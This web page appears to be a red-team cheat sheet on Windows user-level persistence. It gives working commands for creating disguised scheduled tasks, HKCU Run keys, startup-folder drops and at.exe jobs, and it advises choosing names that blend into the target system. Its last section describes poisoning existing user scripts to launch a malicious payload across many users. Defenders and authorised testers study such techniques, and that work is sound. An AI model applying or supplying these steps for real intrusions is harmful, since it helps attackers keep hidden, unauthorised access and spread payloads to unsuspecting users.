Skip to main content

Table Of Contents

  • User Level Persistence
    • Scheduled Task User Persistence
    • Run Key User Persistence
    • Startup Directories
    • at.exe Schedule (WinXP)
    • Poisoning Existing scripts

User Level Persistence

  • Note: This section details important and useful user level persistence techniques. Since they are “user level” they do not require any administrative privileges and most of them execute on user log in.

Scheduled Task User Persistence

  • Note: Upload binary and add scheduled task pointing at that uploaded binary. Can change OfficeUpdater to a task name that blends into target system.

Add user level task that executes at 9:00AM daily

schtasks /Create /F /SC DAILY /ST 09:00 /TN OfficeUpdater /TR <FILE_PATH>

Query task in verbose mode

schtasks /query /tn OfficeUpdater /fo list /v

Delete task

schtasks /delete /tn OfficeUpdater /f

RUN KEY USER PERSISTENCE

  • Note: Upload binary and add run key value pointing at uploaded binary. Can change OfficeUpdater to run key value that blends into target system.

Add key

reg ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V OfficeUpdater /t REG_SZ /F /D "<FILE_PATH>"

Query key

reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Delete key

reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V OfficeUpdater

STARTUP DIRECTORIES

  • Note: Upload binary to a specific "startup" folder. All files in this folder are executed on user login.

Windows NT 6.1, 6.0, Windows 10, Windows 11

:: All users:
%SystemDrive%\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup
:: Specific users:
%SystemDrive%\Users\<USERNAME>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

Windows NT 5.2, 5.1, 5.0

%SystemDrive%\Documents and Settings\All Users\Start Menu\Programs\Startup

Windows 9x

%SystemDrive%\wmiOWS\Start Menu\Programs\Startup

Windows NT 4.0, 3.51, 3.50

%SystemDrive%\WINNT\Profiles\All Users\Start Menu\Programs\Startup

AT.EXE SCHEDULE (WINXP)

Schedule task

at HH:MM <FILE_PATH> [ARGS]

Delete task

at <TASK_ID> /delete

POISONING EXISTING SCRIPTS

  • Enumerate all user persistence methods discussed in this section looking for existing persistence that has been created via script files such as .bat, .ps1, etc.
  • If those are modifiable by a basic user, modify them to launch a malicious uploaded payload. Just beware, if the script is on a file server it could be executed by many users.